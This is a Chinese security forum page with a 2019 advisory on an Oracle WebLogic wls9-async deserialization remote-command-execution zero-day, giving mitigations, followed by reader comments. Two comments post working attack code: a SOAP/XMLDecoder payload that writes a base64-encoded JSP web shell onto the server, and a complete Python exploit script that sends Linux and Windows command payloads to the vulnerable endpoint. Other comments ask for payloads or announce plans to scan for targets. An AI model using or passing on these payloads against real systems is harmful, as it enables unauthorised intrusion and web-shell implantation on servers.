Oracle WebLogic 曝 0day 漏洞,攻击者可远程执行命令

2019-04-23 08:32:49 21 5071

2019年04月17日,国家信息安全漏洞共享平台(CNVD)官方发布安全公告称Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞,攻击者可利用该漏洞在未授权的情况下远程执行命令。

2019年04月17日,国家信息安全漏洞共享平台(CNVD)官方发布安全公告称Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞,攻击者可利用该漏洞在未授权的情况下远程执行命令。

随后知道创宇404实验室启动应急流程,通过分析后复现了该漏洞并确定该漏洞影响启用了wls9_async_response.war及wls-wsat.war组件的所有Weblogic版本(包括最新版本),到本预警发布时,官方仍然没有发布对应修复补丁,属于“0day安全”漏洞。



值得注意的是,知道创宇旗下创宇盾监控发现,该漏洞最早在4月17日存在漏洞扫描痕迹,另外从知道创宇ZoomEye网络空间搜索引擎总共检索到100671条历史数据,其中中国30,600条 主要分布在北京、广东、上海等省市。



由此知道创宇404实验室发出紧急漏洞预警,建议所有使用Oracle WebLogic的用户引起重视,注意防范。目前经过确认,知道创宇旗下云安全防御产品“创宇盾”无需升级即可防御该漏洞。临时解决方案:

    方案1:找到并删除wls9_async_response.war、wls-wsat.war 并重启Weblogic服务
    方案2:通过访问策略控制禁止 /_async/* 及 /wls-wsat/* (注意) 路径的URL访问。
    方案3:启用部署“创宇盾”

关于作者

评论21次

要评论?请先  登录  或  注册
  • TOP1
    2019-4-26 11:03

    0day个鸡毛 。。。

  • TOP2
    2019-4-29 14:42

    weblogic已经沦为下一个struts2了。。一会儿一个命令执行

  • 21楼
    2019-5-5 08:53

    等一个payload

  • 20楼
    2019-4-29 14:42

    weblogic已经沦为下一个struts2了。。一会儿一个命令执行

  • 19楼
    2019-4-28 16:46

    准备扫一波

  • 18楼
    2019-4-28 08:59

    payload有变形的吗,反弹实测可以额,但是需要靶机可访问互联网呀。

  • 17楼
    2019-4-26 15:47

    等一个payload

  • 16楼
    2019-4-26 12:17

    不知道怎么说这个洞,如果有修复经验的 把插件路径删除或者控制,几乎上没什么用。只不过漏洞是最新的而已!

  • 15楼
    2019-4-26 11:27

    <?xml version="1.0" encoding="Utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.xmlDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo PCUKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU Iik7CiU Cg==|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>

  • 14楼
    2019-4-26 11:03

    0day个鸡毛 。。。

  • 13楼
    2019-4-24 17:46

    等大佬复现

  • 12楼
    2019-4-24 17:45

    网传未验证,各位自行检验

    import optparseimport requestsimport base64#proxies = {"http":"http://127.0.0.1:8080"}headers = {'Content-type': 'text/xml'}uri = '/wls-wsat/CoordinatorPortType'linux_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header>   <wsa:Action>demoAction</wsa:Action>    <wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/sh</string> </void><void index="1"> <string>-c</string> </void><void index="2"> <string>%s</string> </void></array><void method="start"/></void> </java> </work:WorkContext>  </soapenv:Header> <soapenv:Body>    <asy:onAsyncDelivery/> </soapenv:Body> </soapenv:Envelope>'''win_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header>   <wsa:Action>demoAction</wsa:Action>    <wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd</string> </void><void index="1"> <string>/c</string> </void><void index="2"> <string>%s</string> </void></array><void method="start"/></void> </java> </work:WorkContext>  </soapenv:Header> <soapenv:Body>    <asy:onAsyncDelivery/> </soapenv:Body> </soapenv:Envelope>'''def exp(url,timeout,cmd):  base64cmd=base64.b64encode(cmd.encode('utf-8'))  linux_poccmd = 'echo %s|base64 -d|bash' % base64cmd  linux_poc2 = linux_poc % linux_poccmd  win_poc2 = win_poc % cmd  url2 = url.rstrip('/')+'/_async/AsyncResponseService'  try:  r1 = requests.post(url2,headers=headers,data=linux_poc2,timeout=timeout)  r2 = requests.post(url2,headers=headers,data=win_poc2,timeout=timeout)  if r1.status_code == 202 or r2.status_code == 202:    print 'ok!'  except requests.ReadTimeout:  print u'Read timeout'  except requests.ConnectionError:  print u'Connect error'  except Exception,e:  print '\tOops\t'+repr(e).split('(')[0]if __name__ == '__main__':  parser = optparse.OptionParser('python %prog ' + '-h (manual)', version='%prog v1.0')  parser.add_option('-u', dest='tgtUrl', type='string', help='single url')  parser.add_option('-s', dest='timeout', type='int', default=7, help='timeout(seconds)')  parser.add_option('-c', dest='cmd', type='string', default='whoami', help='execute command')  (options, args) = parser.parse_args()  # check = options.check  command = options.cmd  timeout = options.timeout  tgtUrl = options.tgtUrl  exp(tgtUrl,timeout,command)

  • 11楼
    2019-4-24 17:31
    liujiajia123

    我拿这个poc去对12版的weblogic进行漏洞执行,为啥发现成功率好低!

    1

    求一份poc

  • 10楼
    2019-4-24 16:25

    我拿这个poc去对12版的weblogic进行漏洞执行,为啥发现成功率好低!

  • 9楼
    2019-4-24 16:10

    等一个payload

  • 8楼
    2019-4-23 21:47

    没有payload灭?

  • 7楼
    2019-4-23 17:52

    WebLogic 可以拿洞斯卡年度冠军

  • 6楼
    2019-4-23 16:50

    emmm.坐等poc

  • 5楼
    2019-4-23 16:46

    又是weblogic……日常爆漏洞,坐等payload

  • 4楼
    2019-4-23 14:15

    WebLogic 时不时爆一个出来

  • 3楼
    2019-4-23 10:32

    WebLogic 日常0day系列

  • 2楼
    2019-4-23 10:26

    payload谁有